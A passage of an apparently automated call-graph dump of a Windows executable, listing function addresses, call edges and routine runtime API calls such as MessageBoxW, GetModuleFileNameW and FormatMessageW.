16162->16173 16164 7ff6404e6b76 16163->16164 16165 7ff6404e6b7b 16164->16165 16166 7ff6404e3fe0 49 API calls 16164->16166 16167 7ff6404e2870 53 API calls 16165->16167 16168 7ff6404e6b9a 16166->16168 16167->16173 16168->16165 16169 7ff6404e3fe0 49 API calls 16168->16169 16170 7ff6404e6bb6 16169->16170 16170->16165 16171 7ff6404e6bbf 16170->16171 16173->15921 16186 7ff6404e30ee memcpy_s 16175->16186 16176 7ff6404eb870 _log10_special 8 API calls 16177 7ff6404e338e 16176->16177 16177->15864 16194 7ff6404e83e0 LocalFree 16177->16194 16178 7ff6404e32e7 16178->16176 16180 7ff6404e1bf0 49 API calls 16180->16186 16181 7ff6404e3309 16183 7ff6404e25f0 53 API calls 16181->16183 16183->16178 16186->16178 16186->16180 16186->16181 16187 7ff6404e32e9 16186->16187 16189 7ff6404e2870 53 API calls 16186->16189 16192 7ff6404e32f7 16186->16192 17398 7ff6404e3f10 16186->17398 17404 7ff6404e7530 16186->17404 17415 7ff6404e15c0 16186->17415 17453 7ff6404e68e0 16186->17453 17457 7ff6404e3b40 16186->17457 17501 7ff6404e3e00 16186->17501 16188 7ff6404e25f0 53 API calls 16187->16188 16188->16178 16189->16186 16193 7ff6404e25f0 53 API calls 16192->16193 16193->16178 16196 7ff6404e262a 16195->16196 16197 7ff6404f3ca4 49 API calls 16196->16197 16198 7ff6404e2652 16197->16198 16199 7ff6404e86b0 2 API calls 16198->16199 16200 7ff6404e266a 16199->16200 16201 7ff6404e268e MessageBoxA 16200->16201 16202 7ff6404e2677 MessageBoxW 16200->16202 16203 7ff6404e26a0 16201->16203 16202->16203 16208 7ff6404eb879 16206->16208 16207 7ff6404e372a 16207->15966 16208->16207 16209 7ff6404ebc00 IsProcessorFeaturePresent 16208->16209 16210 7ff6404ebc18 16209->16210 17637 7ff6404ebdf8 RtlCaptureContext 16210->17637 16216 7ff6404e3f7c 16215->16216 16217 7ff6404e86b0 2 API calls 16216->16217 16218 7ff6404e3fa4 16217->16218 16219 7ff6404e86b0 2 API calls 16218->16219 16220 7ff6404e3fb7 16219->16220 17642 7ff6404f52a4 16220->17642 16223 7ff6404eb870 _log10_special 8 API calls 16224 7ff6404e3746 16223->16224 16224->15874 
16225 7ff6404e76a0 16224->16225 16226 7ff6404e76c4 16225->16226 16227 7ff6404e779b __std_exception_destroy 16226->16227 16228 7ff6404ef9f4 73 API calls 16226->16228 16227->15878 16229 7ff6404e76e0 16228->16229 16229->16227 18033 7ff6404f6bd8 16229->18033 16231 7ff6404e76f5 16231->16227 16232 7ff6404ef9f4 73 API calls 16231->16232 16233 7ff6404ef6bc _fread_nolock 53 API calls 16231->16233 16232->16231 16233->16231 16235 7ff6404ef39c 16234->16235 18048 7ff6404ef148 16235->18048 16237 7ff6404ef3b5 16237->15874 16239 7ff6404e1bf0 49 API calls 16238->16239 16240 7ff6404e3ead 16239->16240 16240->15890 16242 7ff6404e1bf0 49 API calls 16241->16242 16243 7ff6404e4010 16242->16243 16243->15911 16248 7ff6404e65bc 16244->16248 16245 7ff6404eb870 _log10_special 8 API calls 16246 7ff6404e66f1 16245->16246 16246->15925 16247 7ff6404e17e0 45 API calls 16247->16248 16248->16247 16249 7ff6404e675d 16248->16249 16250 7ff6404e1bf0 49 API calls 16248->16250 16252 7ff6404e674a 16248->16252 16254 7ff6404e3f10 10 API calls 16248->16254 16255 7ff6404e66df 16248->16255 16256 7ff6404e670d 16248->16256 16257 7ff6404e7530 52 API calls 16248->16257 16259 7ff6404e2870 53 API calls 16248->16259 16260 7ff6404e6737 16248->16260 16261 7ff6404e15c0 118 API calls 16248->16261 16263 7ff6404e6720 16248->16263 16251 7ff6404e25f0 53 API calls 16249->16251 16250->16248 16251->16255 16253 7ff6404e25f0 53 API calls 16252->16253 16253->16255 16254->16248 16255->16245 16258 7ff6404e25f0 53 API calls 16256->16258 16257->16248 16258->16255 16259->16248 16262 7ff6404e25f0 53 API calls 16260->16262 16261->16248 16262->16255 16264 7ff6404e25f0 53 API calls 16263->16264 16264->16255 18059 7ff6404e81a0 16265->18059 16267 7ff6404e6989 16268 7ff6404e81a0 3 API calls 16267->16268 16269 7ff6404e699c 16268->16269 16270 7ff6404e69cf 16269->16270 16271 7ff6404e69b4 16269->16271 16272 7ff6404e25f0 53 API calls 16270->16272 18063 7ff6404e6ea0 GetProcAddress 16271->18063 16274 7ff6404e3916 16272->16274 16274->15937 16275 
7ff6404e6cd0 16274->16275 16276 7ff6404e6ced 16275->16276 16282 7ff6404e28aa 16281->16282 16283 7ff6404f3ca4 49 API calls 16282->16283 16284 7ff6404e28d2 16283->16284 16285 7ff6404e86b0 2 API calls 16284->16285 16286 7ff6404e28ea 16285->16286 16287 7ff6404e290e MessageBoxA 16286->16287 16288 7ff6404e28f7 MessageBoxW 16286->16288 16289 7ff6404e2920 16287->16289 16288->16289 16290 7ff6404eb870 _log10_special 8 API calls 16289->16290 16291 7ff6404e2930 16290->16291 16292 7ff6404e6780 16291->16292 16293 7ff6404e68d6 16292->16293 16298 7ff6404e6792 16292->16298 16293->15923 18128 7ff6404e5af0 16299->18128 16302 7ff6404e30b9 16308 7ff6404e33a0 16302->16308 16309 7ff6404e33ae 16308->16309 16310 7ff6404e33bf 16309->16310 18416 7ff6404e8180 FreeLibrary 16309->18416 16310->15932 16329 7ff6404f986c 16312->16329 16315 7ff6404f9b5f 16315->16014 16367 7ff6404f477c EnterCriticalSection 16322->16367 16330 7ff6404f98c3 16329->16330 16331 7ff6404f9888 GetLastError 16329->16331 16330->16315 16335 7ff6404f98d8 16330->16335 16332 7ff6404f9898 16331->16332 16342 7ff6404fa6a0 16332->16342 16336 7ff6404f98f4 GetLastError SetLastError 16335->16336 16337 7ff6404f990c 16335->16337 16336->16337 16337->16315 16338 7ff6404f9c10 IsProcessorFeaturePresent 16337->16338 16339 7ff6404f9c23 16338->16339 16359 7ff6404f9924 16339->16359 16343 7ff6404fa6bf FlsGetValue 16342->16343 16344 7ff6404fa6da FlsSetValue 16342->16344 16345 7ff6404fa6d4 16343->16345 16347 7ff6404f98b3 SetLastError 16343->16347 16346 7ff6404fa6e7 16344->16346 16344->16347 16345->16344 16348 7ff6404fdea8 _set_fmode 11 API calls 16346->16348 16347->16330 16349 7ff6404fa6f6 16348->16349 16350 7ff6404fa714 FlsSetValue 16349->16350 16351 7ff6404fa704 FlsSetValue 16349->16351 16353 7ff6404fa732 16350->16353 16354 7ff6404fa720 FlsSetValue 16350->16354 16352 7ff6404fa70d 16351->16352 16356 7ff6404f9c58 __free_lconv_num 11 API calls 16352->16356 16355 7ff6404fa204 _set_fmode 11 API calls 16353->16355 16354->16352 16357 7ff6404fa73a 
16355->16357 16356->16347 16358 7ff6404f9c58 __free_lconv_num 11 API calls 16357->16358 16358->16347 16360 7ff6404f995e _isindst memcpy_s 16359->16360 16361 7ff6404f9986 RtlCaptureContext RtlLookupFunctionEntry 16360->16361 16362 7ff6404f99c0 RtlVirtualUnwind 16361->16362 16363 7ff6404f99f6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16361->16363 16362->16363 16364 7ff6404f9a48 _isindst 16363->16364 16365 7ff6404eb870 _log10_special 8 API calls 16364->16365 16366 7ff6404f9a67 GetCurrentProcess TerminateProcess 16365->16366 16369 7ff6404e33ec GetModuleFileNameW 16368->16369 16369->16018 16369->16019 16371 7ff6404e85df FindClose 16370->16371 16372 7ff6404e85f2 16370->16372 16371->16372 16373 7ff6404eb870 _log10_special 8 API calls 16372->16373 16374 7ff6404e3442 16373->16374 16374->16023 16374->16024 16376 7ff6404ebb70 16375->16376 16377 7ff6404e29fc GetLastError 16376->16377 16378 7ff6404e2a29 16377->16378 16399 7ff6404f3ef8 16378->16399 16383 7ff6404eb870 _log10_special 8 API calls 16384 7ff6404e2ae5 16383->16384 16384->16031 16386 7ff6404e8660 GetFinalPathNameByHandleW CloseHandle 16385->16386 16387 7ff6404e3458 16385->16387 16386->16387 16387->16032 16387->16033 16389 7ff6404e26fa 16388->16389 16390 7ff6404f3ef8 48 API calls 16389->16390 16391 7ff6404e2722 MessageBoxW 16390->16391 16392 7ff6404eb870 _log10_special 8 API calls 16391->16392 16393 7ff6404e274c 16392->16393 16393->16031 16395 7ff6404e878a WideCharToMultiByte 16394->16395 16396 7ff6404e87b5 16394->16396 16395->16396 16397 7ff6404e87cb __std_exception_destroy 16395->16397 16396->16397 16398 7ff6404e87d2 WideCharToMultiByte 16396->16398 16397->16028 16398->16397 16400 7ff6404f3f52 16399->16400 16401 7ff6404f3f77 16400->16401 16402 7ff6404f3fb3 16400->16402 16403 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16401->16403 16421 7ff6404f22b0 16402->16421 16405 7ff6404f3fa1 16403->16405 16406 7ff6404eb870 _log10_special 8 API calls 16405->16406 16409 7ff6404e2a54 
FormatMessageW 16406->16409 16407 7ff6404f9c58 __free_lconv_num 11 API calls 16407->16405 16417 7ff6404e2590 16409->16417 16410 7ff6404f4094 16410->16407 16411 7ff6404f40ba 16411->16410 16414 7ff6404f40c4 16411->16414 16412 7ff6404f4069 16415 7ff6404f9c58 __free_lconv_num 11 API calls 16412->16415 16413 7ff6404f4060 16413->16410 16413->16412 16416 7ff6404f9c58 __free_lconv_num 11 API calls 16414->16416 16415->16405 16416->16405 16418 7ff6404e25b5 16417->16418 16419 7ff6404f3ef8 48 API calls 16418->16419 16420 7ff6404e25d8 MessageBoxW 16419->16420 16420->16383 16422 7ff6404f22ee 16421->16422 16423 7ff6404f22de 16421->16423 16424 7ff6404f22f7 16422->16424 16430 7ff6404f2325 16422->16430 16425 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16423->16425 16426 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16424->16426 16427 7ff6404f231d 16425->16427 16426->16427 16427->16410 16427->16411 16427->16412 16427->16413 16430->16423 16430->16427 16432 7ff6404f2cc4 16430->16432 16465 7ff6404f2710 16430->16465 16502 7ff6404f1ea0 16430->16502 16433 7ff6404f2d06 16432->16433 16434 7ff6404f2d77 16432->16434 16435 7ff6404f2da1 16433->16435 16436 7ff6404f2d0c 16433->16436 16437 7ff6404f2dd0 16434->16437 16438 7ff6404f2d7c 16434->16438 16525 7ff6404f1074 16435->16525 16441 7ff6404f2d40 16436->16441 16442 7ff6404f2d11 16436->16442 16444 7ff6404f2dda 16437->16444 16445 7ff6404f2de7 16437->16445 16449 7ff6404f2ddf 16437->16449 16439 7ff6404f2db1 16438->16439 16440 7ff6404f2d7e 16438->16440 16532 7ff6404f0c64 16439->16532 16443 7ff6404f2d20 16440->16443 16452 7ff6404f2d8d 16440->16452 16447 7ff6404f2d17 16441->16447 16441->16449 16442->16445 16442->16447 16463 7ff6404f2e10 16443->16463 16505 7ff6404f3478 16443->16505 16444->16435 16444->16449 16539 7ff6404f39cc 16445->16539 16447->16443 16453 7ff6404f2d52 16447->16453 16460 7ff6404f2d3b 16447->16460 16449->16463 16543 7ff6404f1484 16449->16543 16452->16435 16455 7ff6404f2d92 16452->16455 16453->16463 16515 7ff6404f37b4 
16453->16515 16455->16463 16521 7ff6404f3878 16455->16521 16457 7ff6404eb870 _log10_special 8 API calls 16459 7ff6404f310a 16457->16459 16459->16430 16460->16463 16464 7ff6404f2ffc 16460->16464 16550 7ff6404f3ae0 16460->16550 16463->16457 16464->16463 16556 7ff6404fdd18 16464->16556 16466 7ff6404f2734 16465->16466 16467 7ff6404f271e 16465->16467 16468 7ff6404f2774 16466->16468 16471 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16466->16471 16467->16468 16469 7ff6404f2d06 16467->16469 16470 7ff6404f2d77 16467->16470 16468->16430 16472 7ff6404f2da1 16469->16472 16473 7ff6404f2d0c 16469->16473 16474 7ff6404f2dd0 16470->16474 16475 7ff6404f2d7c 16470->16475 16471->16468 16483 7ff6404f1074 38 API calls 16472->16483 16478 7ff6404f2d40 16473->16478 16479 7ff6404f2d11 16473->16479 16481 7ff6404f2dda 16474->16481 16482 7ff6404f2de7 16474->16482 16487 7ff6404f2ddf 16474->16487 16476 7ff6404f2db1 16475->16476 16477 7ff6404f2d7e 16475->16477 16485 7ff6404f0c64 38 API calls 16476->16485 16480 7ff6404f2d20 16477->16480 16489 7ff6404f2d8d 16477->16489 16484 7ff6404f2d17 16478->16484 16478->16487 16479->16482 16479->16484 16486 7ff6404f3478 47 API calls 16480->16486 16501 7ff6404f2e10 16480->16501 16481->16472 16481->16487 16488 7ff6404f39cc 45 API calls 16482->16488 16497 7ff6404f2d3b 16483->16497 16484->16480 16490 7ff6404f2d52 16484->16490 16484->16497 16485->16497 16486->16497 16491 7ff6404f1484 38 API calls 16487->16491 16487->16501 16488->16497 16489->16472 16492 7ff6404f2d92 16489->16492 16493 7ff6404f37b4 46 API calls 16490->16493 16490->16501 16491->16497 16495 7ff6404f3878 37 API calls 16492->16495 16492->16501 16493->16497 16494 7ff6404eb870 _log10_special 8 API calls 16496 7ff6404f310a 16494->16496 16495->16497 16496->16430 16498 7ff6404f3ae0 45 API calls 16497->16498 16500 7ff6404f2ffc 16497->16500 16497->16501 16498->16500 16499 7ff6404fdd18 46 API calls 16499->16500 16500->16499 16500->16501 16501->16494 16775 7ff6404f02e8 16502->16775 16506 7ff6404f349e 
16505->16506 16568 7ff6404efea0 16506->16568 16511 7ff6404f35e3 16513 7ff6404f3ae0 45 API calls 16511->16513 16514 7ff6404f3671 16511->16514 16512 7ff6404f3ae0 45 API calls 16512->16511 16513->16514 16514->16460 16516 7ff6404f37e9 16515->16516 16517 7ff6404f382e 16516->16517 16518 7ff6404f3807 16516->16518 16519 7ff6404f3ae0 45 API calls 16516->16519 16517->16460 16520 7ff6404fdd18 46 API calls 16518->16520 16519->16518 16520->16517 16524 7ff6404f3899 16521->16524 16522 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16523 7ff6404f38ca 16522->16523 16523->16460 16524->16522 16524->16523 16526 7ff6404f10a7 16525->16526 16527 7ff6404f10d6 16526->16527 16529 7ff6404f1193 16526->16529 16531 7ff6404f1113 16527->16531 16707 7ff6404eff48 16527->16707 16530 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16529->16530 16530->16531 16531->16460 16533 7ff6404f0c97 16532->16533 16534 7ff6404f0cc6 16533->16534 16536 7ff6404f0d83 16533->16536 16535 7ff6404eff48 12 API calls 16534->16535 16538 7ff6404f0d03 16534->16538 16535->16538 16537 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16536->16537 16537->16538 16538->16460 16540 7ff6404f3a0f 16539->16540 16542 7ff6404f3a13 __crtLCMapStringW 16540->16542 16715 7ff6404f3a68 16540->16715 16542->16460 16544 7ff6404f14b7 16543->16544 16545 7ff6404f14e6 16544->16545 16547 7ff6404f15a3 16544->16547 16546 7ff6404eff48 12 API calls 16545->16546 16549 7ff6404f1523 16545->16549 16546->16549 16548 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16547->16548 16548->16549 16549->16460 16551 7ff6404f3af7 16550->16551 16719 7ff6404fccc8 16551->16719 16557 7ff6404fdd49 16556->16557 16563 7ff6404fdd57 16556->16563 16558 7ff6404fdd77 16557->16558 16559 7ff6404f3ae0 45 API calls 16557->16559 16557->16563 16560 7ff6404fddaf 16558->16560 16561 7ff6404fdd88 16558->16561 16559->16558 16560->16563 16564 7ff6404fde3a 16560->16564 16565 7ff6404fddd9 16560->16565 16765 7ff6404ff3b0 16561->16765 16563->16464 16566 7ff6404febb0 _fread_nolock 
MultiByteToWideChar 16564->16566 16565->16563 16768 7ff6404febb0 16565->16768 16566->16563 16569 7ff6404efed7 16568->16569 16575 7ff6404efec6 16568->16575 16570 7ff6404fc90c _fread_nolock 12 API calls 16569->16570 16569->16575 16571 7ff6404eff04 16570->16571 16572 7ff6404eff18 16571->16572 16573 7ff6404f9c58 __free_lconv_num 11 API calls 16571->16573 16574 7ff6404f9c58 __free_lconv_num 11 API calls 16572->16574 16573->16572 16574->16575 16576 7ff6404fd880 16575->16576 16577 7ff6404fd8d0 16576->16577 16578 7ff6404fd89d 16576->16578 16577->16578 16580 7ff6404fd902 16577->16580 16579 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16578->16579 16589 7ff6404f35c1 16579->16589 16586 7ff6404fda15 16580->16586 16593 7ff6404fd94a 16580->16593 16581 7ff6404fdb07 16631 7ff6404fcd6c 16581->16631 16583 7ff6404fdacd 16624 7ff6404fd104 16583->16624 16585 7ff6404fda9c 16617 7ff6404fd3e4 16585->16617 16586->16581 16586->16583 16586->16585 16587 7ff6404fda5f 16586->16587 16590 7ff6404fda55 16586->16590 16607 7ff6404fd614 16587->16607 16589->16511 16589->16512 16590->16583 16592 7ff6404fda5a 16590->16592 16592->16585 16592->16587 16593->16589 16598 7ff6404f97b4 16593->16598 16596 7ff6404f9c10 _isindst 17 API calls 16597 7ff6404fdb64 16596->16597 16599 7ff6404f97c1 16598->16599 16600 7ff6404f97cb 16598->16600 16599->16600 16605 7ff6404f97e6 16599->16605 16601 7ff6404f43f4 _set_fmode 11 API calls 16600->16601 16602 7ff6404f97d2 16601->16602 16640 7ff6404f9bf0 16602->16640 16603 7ff6404f97de 16603->16589 16603->16596 16605->16603 16606 7ff6404f43f4 _set_fmode 11 API calls 16605->16606 16606->16602 16643 7ff6405033bc 16607->16643 16611 7ff6404fd6bc 16612 7ff6404fd711 16611->16612 16613 7ff6404fd6dc 16611->16613 16616 7ff6404fd6c0 16611->16616 16696 7ff6404fd200 16612->16696 16692 7ff6404fd4bc 16613->16692 16616->16589 16618 7ff6405033bc 38 API calls 16617->16618 16619 7ff6404fd42e 16618->16619 16620 7ff640502e04 37 API calls 16619->16620 16621 7ff6404fd47e 16620->16621 16622 
7ff6404fd482 16621->16622 16623 7ff6404fd4bc 45 API calls 16621->16623 16622->16589 16623->16622 16625 7ff6405033bc 38 API calls 16624->16625 16626 7ff6404fd14f 16625->16626 16627 7ff640502e04 37 API calls 16626->16627 16628 7ff6404fd1a7 16627->16628 16629 7ff6404fd1ab 16628->16629 16630 7ff6404fd200 45 API calls 16628->16630 16629->16589 16630->16629 16632 7ff6404fcde4 16631->16632 16633 7ff6404fcdb1 16631->16633 16635 7ff6404fcdfc 16632->16635 16637 7ff6404fce7d 16632->16637 16634 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16633->16634 16639 7ff6404fcddd memcpy_s 16634->16639 16636 7ff6404fd104 46 API calls 16635->16636 16636->16639 16638 7ff6404f3ae0 45 API calls 16637->16638 16637->16639 16638->16639 16639->16589 16641 7ff6404f9a88 _invalid_parameter_noinfo 37 API calls 16640->16641 16642 7ff6404f9c09 16641->16642 16642->16603 16644 7ff64050340f fegetenv 16643->16644 16645 7ff64050713c 37 API calls 16644->16645 16649 7ff640503462 16645->16649 16646 7ff64050348f 16651 7ff6404f97b4 __std_exception_copy 37 API calls 16646->16651 16647 7ff640503552 16648 7ff64050713c 37 API calls 16647->16648 16650 7ff64050357c 16648->16650 16649->16647 16652 7ff64050352c 16649->16652 16653 7ff64050347d 16649->16653 16654 7ff64050713c 37 API calls 16650->16654 16655 7ff64050350d 16651->16655 16656 7ff6404f97b4 __std_exception_copy 37 API calls 16652->16656 16653->16646 16653->16647 16657 7ff64050358d 16654->16657 16658 7ff640504634 16655->16658 16662 7ff640503515 16655->16662 16656->16655 16660 7ff640507330 20 API calls 16657->16660 16659 7ff6404f9c10 _isindst 17 API calls 16658->16659 16661 7ff640504649 16659->16661 16667 7ff6405035f6 memcpy_s 16660->16667 16663 7ff6404eb870 _log10_special 8 API calls 16662->16663 16664 7ff6404fd661 16663->16664 16688 7ff640502e04 16664->16688 16665 7ff64050399f memcpy_s 16666 7ff640503637 memcpy_s 16685 7ff640503a93 memcpy_s 16666->16685 16687 7ff640503f7b memcpy_s 16666->16687 16667->16665 16667->16666 16671 7ff6404f43f4 _set_fmode 11 
API calls 16667->16671 16668 7ff640502f20 37 API calls 16673 7ff6405043f7 16668->16673 16669 7ff640503cdf 16669->16668 16670 7ff64050464c memcpy_s 37 API calls 16670->16669 16672 7ff640503a70 16671->16672 16674 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16672->16674 16677 7ff64050464c memcpy_s 37 API calls 16673->16677 16681 7ff640504452 16673->16681 16674->16666 16675 7ff640503c8b 16675->16669 16675->16670 16676 7ff6405045d8 16678 7ff64050713c 37 API calls 16676->16678 16677->16681 16678->16662 16679 7ff6404f43f4 11 API calls _set_fmode 16679->16687 16680 7ff6404f43f4 11 API calls _set_fmode 16680->16685 16681->16676 16683 7ff640502f20 37 API calls 16681->16683 16686 7ff64050464c memcpy_s 37 API calls 16681->16686 16682 7ff6404f9bf0 37 API calls _invalid_parameter_noinfo 16682->16685 16683->16681 16684 7ff6404f9bf0 37 API calls _invalid_parameter_noinfo 16684->16687 16685->16675 16685->16680 16685->16682 16686->16681 16687->16669 16687->16675 16687->16679 16687->16684 16689 7ff640502e23 16688->16689 16690 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16689->16690 16691 7ff640502e4e memcpy_s 16689->16691 16690->16691 16691->16611 16693 7ff6404fd4e8 memcpy_s 16692->16693 16694 7ff6404f3ae0 45 API calls 16693->16694 16695 7ff6404fd5a2 memcpy_s 16693->16695 16694->16695 16695->16616 16697 7ff6404fd23b 16696->16697 16702 7ff6404fd288 memcpy_s 16696->16702 16698 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16697->16698 16699 7ff6404fd267 16698->16699 16699->16616 16700 7ff6404fd2f3 16701 7ff6404f97b4 __std_exception_copy 37 API calls 16700->16701 16706 7ff6404fd335 memcpy_s 16701->16706 16702->16700 16703 7ff6404f3ae0 45 API calls 16702->16703 16703->16700 16704 7ff6404f9c10 _isindst 17 API calls 16705 7ff6404fd3e0 16704->16705 16706->16704 16708 7ff6404eff7f 16707->16708 16713 7ff6404eff6e 16707->16713 16709 7ff6404fc90c _fread_nolock 12 API calls 16708->16709 16708->16713 16710 7ff6404effb0 16709->16710 16711 7ff6404f9c58 __free_lconv_num 11 API 
calls 16710->16711 16714 7ff6404effc4 16710->16714 16711->16714 16712 7ff6404f9c58 __free_lconv_num 11 API calls 16712->16713 16713->16531 16714->16712 16716 7ff6404f3a8e 16715->16716 16717 7ff6404f3a86 16715->16717 16716->16542 16718 7ff6404f3ae0 45 API calls 16717->16718 16718->16716 16720 7ff6404fcce1 16719->16720 16722 7ff6404f3b1f 16719->16722 16720->16722 16727 7ff640502614 16720->16727 16723 7ff6404fcd34 16722->16723 16724 7ff6404fcd4d 16723->16724 16726 7ff6404f3b2f 16723->16726 16724->16726 16762 7ff640501960 16724->16762 16726->16464 16739 7ff6404fa460 GetLastError 16727->16739 16730 7ff64050266e 16730->16722 16740 7ff6404fa484 FlsGetValue 16739->16740 16741 7ff6404fa4a1 FlsSetValue 16739->16741 16742 7ff6404fa49b 16740->16742 16758 7ff6404fa491 16740->16758 16743 7ff6404fa4b3 16741->16743 16741->16758 16742->16741 16744 7ff6404fdea8 _set_fmode 11 API calls 16743->16744 16746 7ff6404fa4c2 16744->16746 16745 7ff6404fa50d SetLastError 16747 7ff6404fa52d 16745->16747 16748 7ff6404fa51a 16745->16748 16749 7ff6404fa4e0 FlsSetValue 16746->16749 16750 7ff6404fa4d0 FlsSetValue 16746->16750 16751 7ff6404f9814 _CreateFrameInfo 38 API calls 16747->16751 16748->16730 16761 7ff6404ff5e8 EnterCriticalSection 16748->16761 16754 7ff6404fa4fe 16749->16754 16755 7ff6404fa4ec FlsSetValue 16749->16755 16753 7ff6404fa4d9 16750->16753 16752 7ff6404fa532 16751->16752 16756 7ff6404f9c58 __free_lconv_num 11 API calls 16753->16756 16757 7ff6404fa204 _set_fmode 11 API calls 16754->16757 16755->16753 16756->16758 16759 7ff6404fa506 16757->16759 16758->16745 16760 7ff6404f9c58 __free_lconv_num 11 API calls 16759->16760 16760->16745 16763 7ff6404fa460 _CreateFrameInfo 45 API calls 16762->16763 16764 7ff640501969 16763->16764 16771 7ff640506098 16765->16771 16769 7ff6404febb9 MultiByteToWideChar 16768->16769 16773 7ff6405060fc 16771->16773 16772 7ff6404eb870 _log10_special 8 API calls 16774 7ff6404ff3cd 16772->16774 16773->16772 16774->16563 16776 7ff6404f032f 16775->16776 16777 
7ff6404f031d 16775->16777 16780 7ff6404f033d 16776->16780 16784 7ff6404f0379 16776->16784 16778 7ff6404f43f4 _set_fmode 11 API calls 16777->16778 16779 7ff6404f0322 16778->16779 16781 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16779->16781 16782 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16780->16782 16789 7ff6404f032d 16781->16789 16782->16789 16783 7ff6404f06f5 16785 7ff6404f43f4 _set_fmode 11 API calls 16783->16785 16783->16789 16784->16783 16786 7ff6404f43f4 _set_fmode 11 API calls 16784->16786 16787 7ff6404f0989 16785->16787 16788 7ff6404f06ea 16786->16788 16790 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16787->16790 16791 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16788->16791 16789->16430 16790->16789 16791->16783 16793 7ff6404efa24 16792->16793 16822 7ff6404ef784 16793->16822 16795 7ff6404efa3d 16795->16047 16834 7ff6404ef6dc 16796->16834 16800 7ff6404e277c 16799->16800 16801 7ff6404f43f4 _set_fmode 11 API calls 16800->16801 16802 7ff6404e2799 16801->16802 16848 7ff6404f3ca4 16802->16848 16807 7ff6404e1bf0 49 API calls 16808 7ff6404e2807 16807->16808 16809 7ff6404e86b0 2 API calls 16808->16809 16810 7ff6404e281f 16809->16810 16811 7ff6404e2843 MessageBoxA 16810->16811 16812 7ff6404e282c MessageBoxW 16810->16812 16813 7ff6404e2855 16811->16813 16812->16813 16814 7ff6404eb870 _log10_special 8 API calls 16813->16814 16815 7ff6404e2865 16814->16815 16815->16076 16817 7ff6404e1b06 16816->16817 16818 7ff6404ef439 16816->16818 16817->16075 16817->16076 16819 7ff6404f43f4 _set_fmode 11 API calls 16818->16819 16820 7ff6404ef43e 16819->16820 16821 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16820->16821 16821->16817 16823 7ff6404ef7ee 16822->16823 16824 7ff6404ef7ae 16822->16824 16823->16824 16826 7ff6404ef7fa 16823->16826 16825 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16824->16825 16827 7ff6404ef7d5 16825->16827 16833 7ff6404f477c EnterCriticalSection 16826->16833 16827->16795 16835 7ff6404e19b9 16834->16835 
7ff6404f9c58 __free_lconv_num 11 API calls 19246->19251 19247->18891 19247->18892 19255 7ff6404f4880 19248->19255 19249->19247 19252 7ff6404fc90c _fread_nolock 12 API calls 19250->19252 19251->19250 19252->19247 19253 7ff6404f4887 GetLastError 19254 7ff6404f4368 _fread_nolock 11 API calls 19253->19254 19257 7ff6404f4894 19254->19257 19255->19253 19259 7ff6404f9c58 __free_lconv_num 11 API calls 19255->19259 19262 7ff6404f48b5 19255->19262 19263 7ff6404f48c2 19255->19263 19256 7ff6404febb0 _fread_nolock MultiByteToWideChar 19261 7ff6404f4906 19256->19261 19258 7ff6404f43f4 _set_fmode 11 API calls 19257->19258 19258->19247 19259->19262 19260 7ff6404fc90c _fread_nolock 12 API calls 19260->19263 19261->19247 19261->19253 19262->19260 19263->19247 19263->19256 19265 7ff6404f853d 19264->19265 19276 7ff6404f8539 19264->19276 19285 7ff640501d4c GetEnvironmentStringsW 19265->19285 19268 7ff6404f854a 19270 7ff6404f9c58 __free_lconv_num 11 API calls 19268->19270 19269 7ff6404f8556 19292 7ff6404f86a4 19269->19292 19270->19276 19273 7ff6404f9c58 __free_lconv_num 11 API calls 19274 7ff6404f857d 19273->19274 19275 7ff6404f9c58 __free_lconv_num 11 API calls 19274->19275 19275->19276 19276->18920 19277 7ff6404f88e4 19276->19277 19282 7ff6404f8907 19277->19282 19283 7ff6404f891e 19277->19283 19278 7ff6404febb0 MultiByteToWideChar _fread_nolock 19278->19283 19279 7ff6404fdea8 _set_fmode 11 API calls 19279->19283 19280 7ff6404f8992 19281 7ff6404f9c58 __free_lconv_num 11 API calls 19280->19281 19281->19282 19282->18920 19283->19278 19283->19279 19283->19280 19283->19282 19284 7ff6404f9c58 __free_lconv_num 11 API calls 19283->19284 19284->19283 19286 7ff6404f8542 19285->19286 19287 7ff640501d70 19285->19287 19286->19268 19286->19269 19288 7ff6404fc90c _fread_nolock 12 API calls 19287->19288 19289 7ff640501da7 memcpy_s 19288->19289 19290 7ff6404f9c58 __free_lconv_num 11 API calls 19289->19290 19291 7ff640501dc7 FreeEnvironmentStringsW 19290->19291 19291->19286 19293 7ff6404f86cc 
19292->19293 19294 7ff6404fdea8 _set_fmode 11 API calls 19293->19294 19307 7ff6404f8707 19294->19307 19295 7ff6404f870f 19296 7ff6404f9c58 __free_lconv_num 11 API calls 19295->19296 19298 7ff6404f855e 19296->19298 19297 7ff6404f8789 19299 7ff6404f9c58 __free_lconv_num 11 API calls 19297->19299 19298->19273 19299->19298 19300 7ff6404fdea8 _set_fmode 11 API calls 19300->19307 19301 7ff6404f8778 19303 7ff6404f87c0 11 API calls 19301->19303 19302 7ff6404ff784 37 API calls 19302->19307 19304 7ff6404f8780 19303->19304 19305 7ff6404f9c58 __free_lconv_num 11 API calls 19304->19305 19305->19295 19306 7ff6404f87ac 19308 7ff6404f9c10 _isindst 17 API calls 19306->19308 19307->19295 19307->19297 19307->19300 19307->19301 19307->19302 19307->19306 19309 7ff6404f9c58 __free_lconv_num 11 API calls 19307->19309 19310 7ff6404f87be 19308->19310 19309->19307 19313 7ff640507e41 __crtLCMapStringW 19311->19313 19312 7ff6405063fe 19312->18946 19312->18947 